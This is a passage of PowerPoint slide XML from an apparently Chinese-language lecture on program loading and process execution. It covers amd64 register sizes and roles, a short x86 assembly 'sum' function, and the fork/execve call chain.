      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="7" name="Shape 141">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A55DAE05-9B77-4180-8D01-AC055384DDAB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5528335" y="2206491"/>
            <a:ext cx="2277380" cy="1471"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="8" name="Shape 142">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6AD1EC1A-F8FA-4F3B-88EB-B736259ED818}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="6" idx="1"/>
            <a:endCxn id="2" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="5503988" y="2482464"/>
            <a:ext cx="2301727" cy="3380"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="9" name="Shape 143">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CD1BF977-7E2D-4C76-903A-6886056A5079}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5526511" y="2771200"/>
            <a:ext cx="2279204" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Shape 144">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BCBE9B2-FD68-4767-8CBD-56FC242DA9AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6119198" y="1922550"/>
            <a:ext cx="1251477" cy="28128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t>Address</a:t>
            </a:r>
            <a:endParaRPr sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Shape 145">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0DE01596-B20E-41C7-A6C5-043DFA23A416}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6119198" y="2201179"/>
            <a:ext cx="1251477" cy="28128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Data</a:t>
            </a:r>
            <a:endParaRPr sz="1000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Shape 146">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{851E3087-0D5B-4F81-B291-35B230B9B7C2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5808360" y="2482463"/>
            <a:ext cx="1873152" cy="34040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t>Instruction</a:t>
            </a:r>
            <a:endParaRPr sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Shape 147">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F02F13A3-A257-4E8E-9DA7-DA796D008897}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7132755" y="4267304"/>
            <a:ext cx="2683189" cy="1743626"/>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115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>sum:</a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Verdana"/>
              <a:ea typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
              <a:sym typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="457200" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>push ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Verdana"/>
              <a:ea typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
              <a:sym typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="457200" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>mov ebp, esp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="457200" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>mov eax, [ebp+12]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="457200" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>add eax, [ebp+8]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="457200" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>pop ebp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="457200" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Verdana"/>
                <a:ea typeface="Verdana"/>
                <a:cs typeface="Verdana"/>
                <a:sym typeface="Verdana"/>
              </a:rPr>
              <a:t>ret</a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
              <a:latin typeface="Verdana"/>
              <a:ea typeface="Verdana"/>
              <a:cs typeface="Verdana"/>
              <a:sym typeface="Verdana"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="14" name="Shape 148">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A72542C9-FD2B-46E3-8C94-577DCAA0B115}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6797281" y="5116292"/>
            <a:ext cx="371413" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Shape 149">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{267BE163-EF0E-4DA9-95D7-99DA3B06D662}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6281881" y="4850256"/>
            <a:ext cx="637426" cy="50631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PC</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="16" name="Shape 150">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F756734-EC1F-4FE8-B56C-2665579540CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6797281" y="4911001"/>
            <a:ext cx="371413" cy="1"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="dk2"/>
            </a:solidFill>
            <a:prstDash val="dash"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="18" name="连接符: 肘形 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C522494-CEF7-4080-9BB1-CF7779DC8024}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:stCxn id="6" idx="3"/>
            <a:endCxn id="13" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9815944" y="2482464"/>
            <a:ext cx="12700" cy="2656653"/>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箭头: 右 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6966EA9D-7C3F-4CC4-8C98-66A9DE6263CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9194835" y="2412123"/>
            <a:ext cx="641885" cy="150824"/>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DF636260-8205-47E4-9CDD-EA31275526BA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2438837" y="4619423"/>
            <a:ext cx="233910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进程的执行过程</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="矩形 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F50D5A2-4B01-4D24-882B-13CF3B5F7283}"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>程序的装载与进程的执行</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56230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8BB59FA0-D640-4CBB-9E97-5CE9DA14712D}"/>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6096000" y="754521"/>
            <a:ext cx="5152381" cy="5809524"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="文本框 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8122C1E4-0D06-4388-B5BB-90FBCF50F9BF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="783962" y="921627"/>
            <a:ext cx="2741456"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amd64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>寄存器结构</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="文本框 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{214BACB4-24DE-4266-BA56-55C1F014E2AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1248031" y="1383292"/>
            <a:ext cx="1813317" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>rax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">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8Bytes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>eax</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4Bytes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-34290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ax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">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2Bytes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-34290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ah</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">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1Bytes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-34290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al</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">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1Bytes</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="文本框 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3A43BF4-E13E-482C-B4A6-557B93DA2D54}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="783962" y="3322285"/>
            <a:ext cx="2646878"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部分寄存器的功能</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="文本框 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{988D431C-1273-4D9D-9444-934A24F76FE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1248030" y="4029751"/>
            <a:ext cx="3993401" cy="2308324"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-34290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RIP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1"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存放当前执行的指令的地址</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-34290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RSP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1"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存放当前栈帧的栈顶地址</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-34290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RBP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1"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存放当前栈帧的栈底地址</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-34290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RAX</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1"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通用寄存器。存放函数返回值</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="矩形 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{67B6E333-7C04-472C-9250-57C72ACC5E03}"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>程序的装载与进程的执行</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42926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3" name="Shape 663"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2107967" y="2276600"/>
            <a:ext cx="1555200" cy="384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 ./binary</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="664" name="Shape 664"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="903967" y="3788467"/>
            <a:ext cx="3963200" cy="384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execve("./binary", *argv[], *envp[])</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="665" name="Shape 665"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2107967" y="3032533"/>
            <a:ext cx="1555200" cy="384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fork()</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="666" name="Shape 666"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1846567" y="4675600"/>
            <a:ext cx="2078000" cy="3840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sys_execve()</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="667" name="Shape 667"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1846567" y="5506533"/>
            <a:ext cx="2078000" cy="3840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do_execve()</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="668" name="Shape 668"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
